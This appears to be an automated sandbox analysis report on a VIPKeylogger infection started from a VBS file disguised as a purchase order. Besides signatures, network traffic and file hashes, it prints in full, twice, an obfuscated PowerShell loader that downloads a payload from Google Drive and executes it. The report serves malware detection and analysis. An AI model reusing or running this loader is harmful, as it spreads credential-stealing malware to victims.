2024-10-23 15:03

Reported

2024-10-23 15:06

Platform

win7-20240708-en

Max time kernel

118s

Max time network

119s

Command Line

"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\DistribucionesEnelcaJanS.L.PEDIDO456799.vbs"

Signatures

VIPKeylogger

stealer keylogger vipkeylogger

Command and Scripting Interpreter: PowerShell

execution
Description Indicator Process Target
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A

Legitimate hosting services abused for malware hosting/C2

Description Indicator Process Target
N/A drive.google.com N/A N/A
N/A drive.google.com N/A N/A
N/A drive.google.com N/A N/A

Looks up external IP address via web service

Description Indicator Process Target
N/A checkip.dyndns.org N/A N/A

Suspicious use of NtCreateThreadExHideFromDebugger

Description Indicator Process Target
N/A N/A C:\Windows\SysWOW64\msiexec.exe N/A

Suspicious use of NtSetInformationThreadHideFromDebugger

Description Indicator Process Target
N/A N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\SysWOW64\msiexec.exe N/A

Enumerates physical storage devices

System Location Discovery: System Language Discovery

discovery
Description Indicator Process Target
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\msiexec.exe N/A

Suspicious behavior: MapViewOfSection

Description Indicator Process Target
N/A N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A

Suspicious use of AdjustPrivilegeToken

Description Indicator Process Target
Token: SeDebugPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\SysWOW64\msiexec.exe N/A

Processes

C:\Windows\System32\WScript.exe

"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\DistribucionesEnelcaJanS.L.PEDIDO456799.vbs"

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" " <#Ilks Kapelmester Macrographic Irena Miseres Appendices Larcenic #>;$Hogward194='Halskdens';<#Tvtningernes Sporendes Cortin #>;$Nonputting=$Reorchestrate+$host.UI; function Roosting($Uncrystalled){If ($Nonputting) {$Generiske++;}$Getid=$Kommunikationsformen+$Uncrystalled.'Length'-$Generiske; for( $Pseudoemotional=5;$Pseudoemotional -lt $Getid;$Pseudoemotional+=6){$Mandaars=$Pseudoemotional;$Ulempevilkaarene122+=$Uncrystalled[$Pseudoemotional];$klynkene='Xanthipperne';}$Ulempevilkaarene122;}function Outsprint($Pseudoemotionalncestuous8){ . ($Nonsubtility) ($Pseudoemotionalncestuous8);}$Lame=Roosting ' fresMSig loSel gzPododiVoltalKnaldlPladsaSenne/Astas ';$Lame+=Roosting 'Taarn5Gauge. Crab0Brneh Inob(Raps WKomediCulvenHumpldSkippo NonrwLaur sTakst Dks lNQuay TApost Haand1Sec n0 ,ykm.Bri,a0Vejbr;hackw TrykfWreskoi,outrn Pria6Non o4H pot;Pt,ry therox Darl6Re ar4 tu,i; redi Pejlir istyvTypis:Omste1Maall3Uhlan1 Flu..Subsi0,arde)S lvc ApofeGEksore SamtcGrundkWinecoRet r/O tje2Requ 0S,rap1 Phen0.llel0Wa li1Lacca0Udsag1skyt, DobbeFBr ndiVandsrtamtaeForegfProteoSjuskxGlass/Lgkno1Dives3Hildi1emalj.Taile0O phy ';$Skibsprovianteringens=Roosting ' StatU UltrsUdsuge FinaR Akro-AlkohAAcolygAsylbeIreniNheftetsec,r ';$Discanonize=Roosting 'sulemh RetstPladetHyperpBrow,sBlufr:Atrsg/Dimet/ Syn,dBistrr ElgtiTvedevDreneeElorg.Smughg Spo oWeb uoOoriagStormlColleeUpbra. OmorcN namoMfikkmIm er/camemu remicOperc?UdkmpeDyne xN.nrap oceloTra,srWreattR.esu= udedDagbaoIndsnwRomannFodbolAelu oRecuraNgtfldLe le&Sy taiFremkdUnsac= .rig1 Hastq oppo2KerneSVari NB ysk6DashedAblew6Flekss nforfPopulcAnthrOMon iENitr,eKa.enx,reenGTrope1Se ar9.lankWBjelia EuphNSams,LD finkMis twBiddeATele,tProdutCorke4 ejldXRa et_AntirkGruttCAdelsyOphth ';$Elysisk57=Roosting 'Ou ha>Se is ';$Nonsubtility=Roosting 'LibysiFo ruETactaXHisto ';$Uncapitalizeds='Budcentralens';$Markedsundersgelser='\Bindehindens.Stu';Outsprint (Roosting 'Tu ul$I stigAfrohllsgngOFavo,BSuperaP otelOma d: .yvebSlibeA WhisgantihM TolvAulivsN edviDSmaareDispaN.nderSoxyty= Sted$KolleEApo eNSandpv Rdli:VidovAPallep KellpChartdHotheAadde tphalaaOphol+Beaum$Ov remDecimA S emrQuattKFrokoEUncopDNonbis FimsUSoljeNFantadPu keePatteRSklmeS red,GSy deeSkabeLLrebrSBecl,ePr darKnop ');Outsprint (Roosting ' p nd$eutonGUro ll Cit OHypodb RegnAAkkusL aski: rissaRvegrcActsbhB mboEselvinBouldILisseAInsurLDroll=Chefp$haem D oloIValyls S idcSpindA rounNSandbO Radin BrodI heckz Fjere,katt.resatSR,ppoPTel,ml C ssi Eus tAddee(mor o$OverseDrevnlReh.bYAetiosKonf,Iw lpaSSubstKEksam5Minis7Sig a)Kulde ');Outsprint (Roosting 'frem [KitefnTudedESki,et nonf.K.abtSFrarveNeurorAltsaVLssalIMormyC,utofe Torsp disgoEjendiE,sasn Fr mTAfstrmFugleaA couN FlydA PortG iod eKre.trNorma]Metra:Myste: irres ByggE BlancU.komuTelefRDin,aiLok.ltJap nYYndliPTheetrDblbeOJinritSadelO,etaiCUnderOA,cuslPen i Prea= Chut Creep[MiswonOmredEAfrunT Str,.Aa,tuSUds.oEPr abcU thru Bevgr rofeiDouseTNona YKi owphaderraktivoSync.tFletnOPaas,CWasheo NedslMask TGon.oy etalpLymphe Syda]Liss.:Feign:IndokT.espulAnormsInezs1 ygge2Lbeti ');$Discanonize=$Achenial[0];$Acetylenyl=(Roosting ' ibec$ DbefGjungels bcoOBogstbEj kua Som.lBagat: YurukP teno MeniM OnomFDebeauBrancrReec sGrund= ExhaNCampaeKra.tWW gge-RdbyeoPaakrbParagjElskoEOrdreC L ftTForsv DispasWerebyPreciSHen yTKleviELasermGente.BetakN panteBeskft ngag.BlackW Fod,EOdd rb Besoc aillMyzosi ernaeVokalNDemontGanoi ');Outsprint ($Acetylenyl);Outsprint (Roosting ' Rem $ diplKUnderoEl.ktmIndkvfSo icuBenz rDvalesDgnin.OfterHChoroeAgerhastratd ownce ortrrTed ysCreti[Acari$YnettSPerjukHellii To,lbi,adjsho ospS astrKlyn oRedrevanusvi Dispa Un gnuddatt Udfoe VarirSplidiPengenSk bigSu.faeLocutnDrilssDr,vk]Tran.=Sansc$PudsyLSkyndaP otomEverteSpiro ');$Delprojekts=Roosting 'Folke$ GeneKPr.rio aguemOutf.fUnprou rderEnkels Hell.HummoDInferoleprowclarinAb,kalHomemoSatsbaFortndDist FOptimi Sol lDarede Octa( Prim$ NewsD agsli BasisGnistcKpuesaSolavn UnreoStyrkn odeliTrueiz ricoeMotio, C ys$ HamaNEgoc eOplukdjacqurFlyttiImplegUnsuis,hosptWrot ) Koge ';$Nedrigst=$Bagmandens;Outsprint (Roosting ' Syva$syntoG Ch cLinfitOB,okbBEntalAH,mouL Penn:TelauFFlinto Bevarfor at Tranh PresBGr ndR PhytISarg nJinklGSupereMesiaR,apfo= inje(Expe.tFo stEMiljkS SolltDykni-ForspPInvalafilteT DamkHMi,rg Mis.r$fejekn.icote Ndsid,underExpilIUncligNyde S rotetFlamb)Overb ');while (!$Forthbringer) {Outsprint (Roosting 'isaia$Homogg AarslBeornoMinu.bCosm a resslAfsta:cel,iRtinsehTuteliVrdi zGastromatrosBe,titVer.fo,lsnemKarr oS atiuFljtesIdre =Foreb$Sa elt rocer Que,umnbodeFlans ') ;Outsprint $Delprojekts;Outsprint (Roosting ' ProgS SyltTOpsp aS cerr SpndTBeslu-Exumbs luel UnfeeS tteE BldgpJudok Admi4Bille ');Outsprint (Roosting 'Portm$damokgscho.LFrf eOLogotBfors AFulmiL M ol:Lipa FHydroOSuperR olctUngdoHUncomBDe amrDisafIOvercnSvi.gG BallEF rmerSewer=Skaer( CounT FiduESkabiSYoke.TRo en-AcetoPAnc.raFuelotstridH Skep ,sko$ orenN Ra,seVoltidOpgivRPoloniGarvngPropisAerogtFeat,) Saan ') ;Outsprint (Roosting 'Pr,va$ orpugShortLStimuo EnkebUnconaolympLEmbas:F ernaNontaVslingaJadeiN Dro TSubmiGFor rA GausrUdstndUntotE Ek kSHisto=Proba$ De ag empelUndisoUdflyBPlbroAAdamiLSacch:TroweFUnsacLFunktEchi otGangatHomopE Pr ddI aksETimel+Trans+Eubac%Modfo$Ful fAStorkc Tem.hHemate,kuffNEtymoi UdbrAPenseLSki e.For fCinfluODieseUHe reNDinottVoldt ') ;$Discanonize=$Achenial[$Avantgardes];}$Levisticum=324089;$Paragraffer=32274;Outsprint (Roosting ' Beau$Sp oggSerfalUngarokal aBMenaca MaholGalea:ErhveL DjrvOLegatpBonifHVe.stI DelaOAlcohsSchattBk.enOStrafM EkseoS.msou SpagsGappe Uspor= carr FirspGa tagec gnatSlide-SendeCJur so snitn IldsTBesvrETrepanPrizeTNonin Vejr$ FleunnebeneUdvikdclav.r AssoiA,klagEneboSNemdrTIli c ');Outsprint (Roosting 'Clois$,orgegRaffilG,erno ekurbmaal aP ognlYarm.:AlichSReas aSkuddb D rslSynsfeNonserindkr Rus.h=,raab nful[Skr lSHardtyRundssMarg tC.rraeTo.rimskrab.H olaC Ar loEdgi nL.konvOdsteeCor mr ccortMjsom]her,d:Umb l:TenonF.rster Vin.o misdm vausBDi wiaAmba sOpseneGu tu6Kvidd4MontmSFla.kt S olr gteriUnendnKlikeg Hy e( Ferm$WhereLHydroo Udlsp attehTole iTokr oGe,ets F netMethioVedanmErobro SipuuEyeb sD,nin)Ligeg ');Outsprint (Roosting 'Raspi$ Blamg lmenl AtteoFormyB seudaBehanlChurc: FrasK CircOCo.ieLDoor,EOxycyRCystoaGsene S.ere= orb For.i[ iscSCont yL.rersBandgt.rentEAllerMSober.,yfust ForueGrinnxT torTTempo. La dEAnagenSlingCdogmaOBlo,sDDvuthIwaddlNProjeG Park]Kollo: De o:Cyc oa ArtisFlyveCTerepiD eniiCapac.drbesGLineoePulvetPenthssp,ttTHel,rRS.mneiRopelN SurdgCamer( grah$Ho.piS SammADecomb.nterlForsveCulderCy,no)Multi ');Outsprint (Roosting 'Th rs$S,mtsgmisthLValouo.konfBConduaBifaglDears:SamoadBanneO UdstmTe efkPseudaRigg PSolacE alkaLlnd.lLOcculeOpmagrR gmasPro,c= Proj$CriniKDichro pyroLPrfabE ForbrGeomeAMise .Hullos,rugeu oogeBMicroSTaaretOpganR S adirumfaNCont g Reso(,resb$Rum alHin ueTu uivPromiiK.ndeSAburtt ZeroIPtychC Tr vUSantamIndiv,Super$RegalpCitriaUltraR KeraA ackwgVivisR Til.a .ikvf Scumf BurgEShoplrBur e)T mot ');Outsprint $Domkapellers;"

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe

"C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe" " <#Ilks Kapelmester Macrographic Irena Miseres Appendices Larcenic #>;$Hogward194='Halskdens';<#Tvtningernes Sporendes Cortin #>;$Nonputting=$Reorchestrate+$host.UI; function Roosting($Uncrystalled){If ($Nonputting) {$Generiske++;}$Getid=$Kommunikationsformen+$Uncrystalled.'Length'-$Generiske; for( $Pseudoemotional=5;$Pseudoemotional -lt $Getid;$Pseudoemotional+=6){$Mandaars=$Pseudoemotional;$Ulempevilkaarene122+=$Uncrystalled[$Pseudoemotional];$klynkene='Xanthipperne';}$Ulempevilkaarene122;}function Outsprint($Pseudoemotionalncestuous8){ . ($Nonsubtility) ($Pseudoemotionalncestuous8);}$Lame=Roosting ' fresMSig loSel gzPododiVoltalKnaldlPladsaSenne/Astas ';$Lame+=Roosting 'Taarn5Gauge. Crab0Brneh Inob(Raps WKomediCulvenHumpldSkippo NonrwLaur sTakst Dks lNQuay TApost Haand1Sec n0 ,ykm.Bri,a0Vejbr;hackw TrykfWreskoi,outrn Pria6Non o4H pot;Pt,ry therox Darl6Re ar4 tu,i; redi Pejlir istyvTypis:Omste1Maall3Uhlan1 Flu..Subsi0,arde)S lvc ApofeGEksore SamtcGrundkWinecoRet r/O tje2Requ 0S,rap1 Phen0.llel0Wa li1Lacca0Udsag1skyt, DobbeFBr ndiVandsrtamtaeForegfProteoSjuskxGlass/Lgkno1Dives3Hildi1emalj.Taile0O phy ';$Skibsprovianteringens=Roosting ' StatU UltrsUdsuge FinaR Akro-AlkohAAcolygAsylbeIreniNheftetsec,r ';$Discanonize=Roosting 'sulemh RetstPladetHyperpBrow,sBlufr:Atrsg/Dimet/ Syn,dBistrr ElgtiTvedevDreneeElorg.Smughg Spo oWeb uoOoriagStormlColleeUpbra. OmorcN namoMfikkmIm er/camemu remicOperc?UdkmpeDyne xN.nrap oceloTra,srWreattR.esu= udedDagbaoIndsnwRomannFodbolAelu oRecuraNgtfldLe le&Sy taiFremkdUnsac= .rig1 Hastq oppo2KerneSVari NB ysk6DashedAblew6Flekss nforfPopulcAnthrOMon iENitr,eKa.enx,reenGTrope1Se ar9.lankWBjelia EuphNSams,LD finkMis twBiddeATele,tProdutCorke4 ejldXRa et_AntirkGruttCAdelsyOphth ';$Elysisk57=Roosting 'Ou ha>Se is ';$Nonsubtility=Roosting 'LibysiFo ruETactaXHisto ';$Uncapitalizeds='Budcentralens';$Markedsundersgelser='\Bindehindens.Stu';Outsprint (Roosting 'Tu ul$I stigAfrohllsgngOFavo,BSuperaP otelOma d: .yvebSlibeA WhisgantihM TolvAulivsN edviDSmaareDispaN.nderSoxyty= Sted$KolleEApo eNSandpv Rdli:VidovAPallep KellpChartdHotheAadde tphalaaOphol+Beaum$Ov remDecimA S emrQuattKFrokoEUncopDNonbis FimsUSoljeNFantadPu keePatteRSklmeS red,GSy deeSkabeLLrebrSBecl,ePr darKnop ');Outsprint (Roosting ' p nd$eutonGUro ll Cit OHypodb RegnAAkkusL aski: rissaRvegrcActsbhB mboEselvinBouldILisseAInsurLDroll=Chefp$haem D oloIValyls S idcSpindA rounNSandbO Radin BrodI heckz Fjere,katt.resatSR,ppoPTel,ml C ssi Eus tAddee(mor o$OverseDrevnlReh.bYAetiosKonf,Iw lpaSSubstKEksam5Minis7Sig a)Kulde ');Outsprint (Roosting 'frem [KitefnTudedESki,et nonf.K.abtSFrarveNeurorAltsaVLssalIMormyC,utofe Torsp disgoEjendiE,sasn Fr mTAfstrmFugleaA couN FlydA PortG iod eKre.trNorma]Metra:Myste: irres ByggE BlancU.komuTelefRDin,aiLok.ltJap nYYndliPTheetrDblbeOJinritSadelO,etaiCUnderOA,cuslPen i Prea= Chut Creep[MiswonOmredEAfrunT Str,.Aa,tuSUds.oEPr abcU thru Bevgr rofeiDouseTNona YKi owphaderraktivoSync.tFletnOPaas,CWasheo NedslMask TGon.oy etalpLymphe Syda]Liss.:Feign:IndokT.espulAnormsInezs1 ygge2Lbeti ');$Discanonize=$Achenial[0];$Acetylenyl=(Roosting ' ibec$ DbefGjungels bcoOBogstbEj kua Som.lBagat: YurukP teno MeniM OnomFDebeauBrancrReec sGrund= ExhaNCampaeKra.tWW gge-RdbyeoPaakrbParagjElskoEOrdreC L ftTForsv DispasWerebyPreciSHen yTKleviELasermGente.BetakN panteBeskft ngag.BlackW Fod,EOdd rb Besoc aillMyzosi ernaeVokalNDemontGanoi ');Outsprint ($Acetylenyl);Outsprint (Roosting ' Rem $ diplKUnderoEl.ktmIndkvfSo icuBenz rDvalesDgnin.OfterHChoroeAgerhastratd ownce ortrrTed ysCreti[Acari$YnettSPerjukHellii To,lbi,adjsho ospS astrKlyn oRedrevanusvi Dispa Un gnuddatt Udfoe VarirSplidiPengenSk bigSu.faeLocutnDrilssDr,vk]Tran.=Sansc$PudsyLSkyndaP otomEverteSpiro ');$Delprojekts=Roosting 'Folke$ GeneKPr.rio aguemOutf.fUnprou rderEnkels Hell.HummoDInferoleprowclarinAb,kalHomemoSatsbaFortndDist FOptimi Sol lDarede Octa( Prim$ NewsD agsli BasisGnistcKpuesaSolavn UnreoStyrkn odeliTrueiz ricoeMotio, C ys$ HamaNEgoc eOplukdjacqurFlyttiImplegUnsuis,hosptWrot ) Koge ';$Nedrigst=$Bagmandens;Outsprint (Roosting ' Syva$syntoG Ch cLinfitOB,okbBEntalAH,mouL Penn:TelauFFlinto Bevarfor at Tranh PresBGr ndR PhytISarg nJinklGSupereMesiaR,apfo= inje(Expe.tFo stEMiljkS SolltDykni-ForspPInvalafilteT DamkHMi,rg Mis.r$fejekn.icote Ndsid,underExpilIUncligNyde S rotetFlamb)Overb ');while (!$Forthbringer) {Outsprint (Roosting 'isaia$Homogg AarslBeornoMinu.bCosm a resslAfsta:cel,iRtinsehTuteliVrdi zGastromatrosBe,titVer.fo,lsnemKarr oS atiuFljtesIdre =Foreb$Sa elt rocer Que,umnbodeFlans ') ;Outsprint $Delprojekts;Outsprint (Roosting ' ProgS SyltTOpsp aS cerr SpndTBeslu-Exumbs luel UnfeeS tteE BldgpJudok Admi4Bille ');Outsprint (Roosting 'Portm$damokgscho.LFrf eOLogotBfors AFulmiL M ol:Lipa FHydroOSuperR olctUngdoHUncomBDe amrDisafIOvercnSvi.gG BallEF rmerSewer=Skaer( CounT FiduESkabiSYoke.TRo en-AcetoPAnc.raFuelotstridH Skep ,sko$ orenN Ra,seVoltidOpgivRPoloniGarvngPropisAerogtFeat,) Saan ') ;Outsprint (Roosting 'Pr,va$ orpugShortLStimuo EnkebUnconaolympLEmbas:F ernaNontaVslingaJadeiN Dro TSubmiGFor rA GausrUdstndUntotE Ek kSHisto=Proba$ De ag empelUndisoUdflyBPlbroAAdamiLSacch:TroweFUnsacLFunktEchi otGangatHomopE Pr ddI aksETimel+Trans+Eubac%Modfo$Ful fAStorkc Tem.hHemate,kuffNEtymoi UdbrAPenseLSki e.For fCinfluODieseUHe reNDinottVoldt ') ;$Discanonize=$Achenial[$Avantgardes];}$Levisticum=324089;$Paragraffer=32274;Outsprint (Roosting ' Beau$Sp oggSerfalUngarokal aBMenaca MaholGalea:ErhveL DjrvOLegatpBonifHVe.stI DelaOAlcohsSchattBk.enOStrafM EkseoS.msou SpagsGappe Uspor= carr FirspGa tagec gnatSlide-SendeCJur so snitn IldsTBesvrETrepanPrizeTNonin Vejr$ FleunnebeneUdvikdclav.r AssoiA,klagEneboSNemdrTIli c ');Outsprint (Roosting 'Clois$,orgegRaffilG,erno ekurbmaal aP ognlYarm.:AlichSReas aSkuddb D rslSynsfeNonserindkr Rus.h=,raab nful[Skr lSHardtyRundssMarg tC.rraeTo.rimskrab.H olaC Ar loEdgi nL.konvOdsteeCor mr ccortMjsom]her,d:Umb l:TenonF.rster Vin.o misdm vausBDi wiaAmba sOpseneGu tu6Kvidd4MontmSFla.kt S olr gteriUnendnKlikeg Hy e( Ferm$WhereLHydroo Udlsp attehTole iTokr oGe,ets F netMethioVedanmErobro SipuuEyeb sD,nin)Ligeg ');Outsprint (Roosting 'Raspi$ Blamg lmenl AtteoFormyB seudaBehanlChurc: FrasK CircOCo.ieLDoor,EOxycyRCystoaGsene S.ere= orb For.i[ iscSCont yL.rersBandgt.rentEAllerMSober.,yfust ForueGrinnxT torTTempo. La dEAnagenSlingCdogmaOBlo,sDDvuthIwaddlNProjeG Park]Kollo: De o:Cyc oa ArtisFlyveCTerepiD eniiCapac.drbesGLineoePulvetPenthssp,ttTHel,rRS.mneiRopelN SurdgCamer( grah$Ho.piS SammADecomb.nterlForsveCulderCy,no)Multi ');Outsprint (Roosting 'Th rs$S,mtsgmisthLValouo.konfBConduaBifaglDears:SamoadBanneO UdstmTe efkPseudaRigg PSolacE alkaLlnd.lLOcculeOpmagrR gmasPro,c= Proj$CriniKDichro pyroLPrfabE ForbrGeomeAMise .Hullos,rugeu oogeBMicroSTaaretOpganR S adirumfaNCont g Reso(,resb$Rum alHin ueTu uivPromiiK.ndeSAburtt ZeroIPtychC Tr vUSantamIndiv,Super$RegalpCitriaUltraR KeraA ackwgVivisR Til.a .ikvf Scumf BurgEShoplrBur e)T mot ');Outsprint $Domkapellers;"

C:\Windows\SysWOW64\msiexec.exe

"C:\Windows\SysWOW64\msiexec.exe"

Network

Country Destination Domain Proto
US 8.8.8.8:53 drive.google.com udp
GB 172.217.16.238:443 drive.google.com tcp
US 8.8.8.8:53 drive.usercontent.google.com udp
GB 216.58.201.97:443 drive.usercontent.google.com tcp
GB 172.217.16.238:443 drive.google.com tcp
US 8.8.8.8:53 c.pki.goog udp
GB 142.250.178.3:80 c.pki.goog tcp
US 8.8.8.8:53 o.pki.goog udp
GB 142.250.178.3:80 o.pki.goog tcp
GB 216.58.201.97:443 drive.usercontent.google.com tcp
US 8.8.8.8:53 checkip.dyndns.org udp
DE 193.122.6.168:80 checkip.dyndns.org tcp
US 8.8.8.8:53 reallyfreegeoip.org udp
US 172.67.177.134:443 reallyfreegeoip.org tcp
US 8.8.8.8:53 api.telegram.org udp
NL 149.154.167.220:443 api.telegram.org tcp
US 8.8.8.8:53 crl.microsoft.com udp
GB 2.18.190.73:80 crl.microsoft.com tcp
US 8.8.8.8:53 www.microsoft.com udp
GB 184.25.193.234:80 www.microsoft.com tcp

Files

memory/2700-4-0x000007FEF60CE000-0x000007FEF60CF000-memory.dmp

memory/2700-5-0x000007FEF5E10000-0x000007FEF67AD000-memory.dmp

memory/2700-6-0x000000001B6F0000-0x000000001B9D2000-memory.dmp

memory/2700-7-0x000007FEF5E10000-0x000007FEF67AD000-memory.dmp

memory/2700-8-0x0000000001EE0000-0x0000000001EE8000-memory.dmp

memory/2700-9-0x000007FEF5E10000-0x000007FEF67AD000-memory.dmp

memory/2700-10-0x000007FEF60CE000-0x000007FEF60CF000-memory.dmp

memory/2700-11-0x000007FEF5E10000-0x000007FEF67AD000-memory.dmp

memory/2700-13-0x000007FEF5E10000-0x000007FEF67AD000-memory.dmp

memory/2700-15-0x000007FEF5E10000-0x000007FEF67AD000-memory.dmp

C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\FVLL3ESHKXJFXX1D8EA1.temp

MD5 2d065c66d5e9293f616b97f6f99d65a1
SHA1 5e4ad8f229ce0742ec6cba772aacc4d34aab5f9c
SHA256 391782ac7dc0a2347fbe4a0c0c123a2a5763e44d8155125b46e4c59c56c9a68d
SHA512 d96f7e1449e6d7ddb1877d36b1ea60f8a38153798728f7ca2c00e476fb95e4c0a73dda342a0e1cc793ff61f52ab0aea02bcba4d00ac0968e7bc238a4ab7e92f3

C:\Users\Admin\AppData\Roaming\Bindehindens.Stu

MD5 d43327229caac3f1c1c7443675eaa345
SHA1 169d456a6122e6a39603f3017eb16df162aca251
SHA256 0144e44b033690c4d3387d5125a5a76003d371ca48116a53d1439f83d6b530d3
SHA512 da4cdb914c5618ca83f4f97bf28d89899bc9459ff797b6f865488a7f446b56cea77bbe37aeb2e89fb81937b6fa1929a2e6c9feca5fa2ee32344f21e0dff3a10d

memory/2072-19-0x0000000006750000-0x000000000BA5E000-memory.dmp

memory/2276-41-0x0000000000F30000-0x0000000001F92000-memory.dmp

memory/2276-42-0x0000000000F30000-0x0000000001F92000-memory.dmp

memory/2276-43-0x0000000000F30000-0x0000000000F78000-memory.dmp